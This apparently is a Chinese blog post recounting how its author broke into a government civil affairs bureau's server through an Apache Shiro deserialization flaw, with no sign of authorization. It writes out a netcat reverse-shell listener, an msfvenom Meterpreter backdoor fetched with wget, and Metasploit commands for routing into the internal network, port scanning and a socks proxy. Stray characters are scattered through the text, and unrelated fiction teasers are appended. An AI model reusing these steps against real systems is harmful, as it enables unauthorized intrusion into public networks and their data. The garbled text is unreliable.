某民政局shiro反序列化漏洞的滲透過程

打進內網以后的過程沒有繼續(xù)深入搞锹引,具體原因大家懂的冶伞,

前期打點系任,開始的想法是爆破個弱口令的恳蹲,弱口令爆破一圈沒有找到有用的賬戶,

返回包存在 :Set-Cookie: rememberMe=deleteMe; 參數俩滥, 測試一下 shiro漏洞嘉蕾,萬一沒修復就撿到了,美滋滋

成功打到DNSLOG 返回信息


得到log霜旧,確定漏洞是存在的错忱,腳本寫入linux反彈shell的命令,

vps 開啟NC 監(jiān)聽? nc -lvp 777 成功返回



獲得服務器權限 root 挂据,開始通過dnslog 知道服務器是通外網的以清,利用msf 生成? elf 后門

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=IP LPORT=端口 -f elf > 123.elf

把生成好的后門放在遠程HTTP服務上面,

在shell里崎逃,wget 遠程下載


成功下載以后掷倔,chmod 給后門權限 777 就行,-rwxrwxrwx 1 root root



msf 運行命令? use exploit/multi/handler?? 獲得shell反彈地址

set?payload linux/x64/meterpreter/reverse_tcp

地址填寫VPS? 端口寫后門端口就好了个绍,直接run


查看內網路由勒葱,添加路由命令

run get_local_subnets //獲取路由地址

run autoroute -s xxx.xxx.xxx.xxx/24 //添加路由

run autoroute -p //查看添加的路由

run autorouute -d //刪除添加的路由



內網掃描端口? use auxiliary/scanner/portscan/tcp?


利用msf socks4a模塊代理

use auxiliary/server/socks4a?

set SRVHOST IP

set SRVPORT 端口

運行返回信息:

msf5 auxiliary(server/socks4a) > run

[*] Auxiliary module running as background job 0.

[*] Starting the socks4a proxy server

本地利用代理連接 代理的服務器 設置好端口 ,瀏覽器訪問

某會議系統(tǒng)


?著作權歸作者所有,轉載或內容合作請聯系作者
  • 序言:七十年代末巴柿,一起剝皮案震驚了整個濱河市凛虽,隨后出現的幾起案子,更是在濱河造成了極大的恐慌广恢,老刑警劉巖凯旋,帶你破解...
    沈念sama閱讀 221,548評論 6 515
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現場離奇詭異,居然都是意外死亡瓦阐,警方通過查閱死者的電腦和手機蜗侈,發(fā)現死者居然都...
    沈念sama閱讀 94,497評論 3 399
  • 文/潘曉璐 我一進店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來睡蟋,“玉大人踏幻,你說我怎么就攤上這事〈辽保” “怎么了该面?”我有些...
    開封第一講書人閱讀 167,990評論 0 360
  • 文/不壞的土叔 我叫張陵,是天一觀的道長信卡。 經常有香客問我隔缀,道長,這世上最難降的妖魔是什么傍菇? 我笑而不...
    開封第一講書人閱讀 59,618評論 1 296
  • 正文 為了忘掉前任猾瘸,我火速辦了婚禮,結果婚禮上丢习,老公的妹妹穿的比我還像新娘牵触。我一直安慰自己,他們只是感情好咐低,可當我...
    茶點故事閱讀 68,618評論 6 397
  • 文/花漫 我一把揭開白布揽思。 她就那樣靜靜地躺著,像睡著了一般见擦。 火紅的嫁衣襯著肌膚如雪钉汗。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 52,246評論 1 308
  • 那天鲤屡,我揣著相機與錄音损痰,去河邊找鬼。 笑死酒来,一個胖子當著我的面吹牛卢未,可吹牛的內容都是我干的。 我是一名探鬼主播役首,決...
    沈念sama閱讀 40,819評論 3 421
  • 文/蒼蘭香墨 我猛地睜開眼尝丐,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了衡奥?” 一聲冷哼從身側響起爹袁,我...
    開封第一講書人閱讀 39,725評論 0 276
  • 序言:老撾萬榮一對情侶失蹤,失蹤者是張志新(化名)和其女友劉穎矮固,沒想到半個月后失息,有當地人在樹林里發(fā)現了一具尸體譬淳,經...
    沈念sama閱讀 46,268評論 1 320
  • 正文 獨居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內容為張勛視角 年9月15日...
    茶點故事閱讀 38,356評論 3 340
  • 正文 我和宋清朗相戀三年盹兢,在試婚紗的時候發(fā)現自己被綠了邻梆。 大學時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點故事閱讀 40,488評論 1 352
  • 序言:一個原本活蹦亂跳的男人離奇死亡绎秒,死狀恐怖浦妄,靈堂內的尸體忽然破棺而出,到底是詐尸還是另有隱情见芹,我是刑警寧澤剂娄,帶...
    沈念sama閱讀 36,181評論 5 350
  • 正文 年R本政府宣布,位于F島的核電站玄呛,受9級特大地震影響阅懦,放射性物質發(fā)生泄漏。R本人自食惡果不足惜徘铝,卻給世界環(huán)境...
    茶點故事閱讀 41,862評論 3 333
  • 文/蒙蒙 一耳胎、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧惕它,春花似錦怕午、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 32,331評論 0 24
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽钳宪。三九已至揭北,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間吏颖,已是汗流浹背搔体。 一陣腳步聲響...
    開封第一講書人閱讀 33,445評論 1 272
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留半醉,地道東北人疚俱。 一個月前我還...
    沈念sama閱讀 48,897評論 3 376
  • 正文 我出身青樓,卻偏偏與公主長得像缩多,于是被迫代替她去往敵國和親呆奕。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當晚...
    茶點故事閱讀 45,500評論 2 359

推薦閱讀更多精彩內容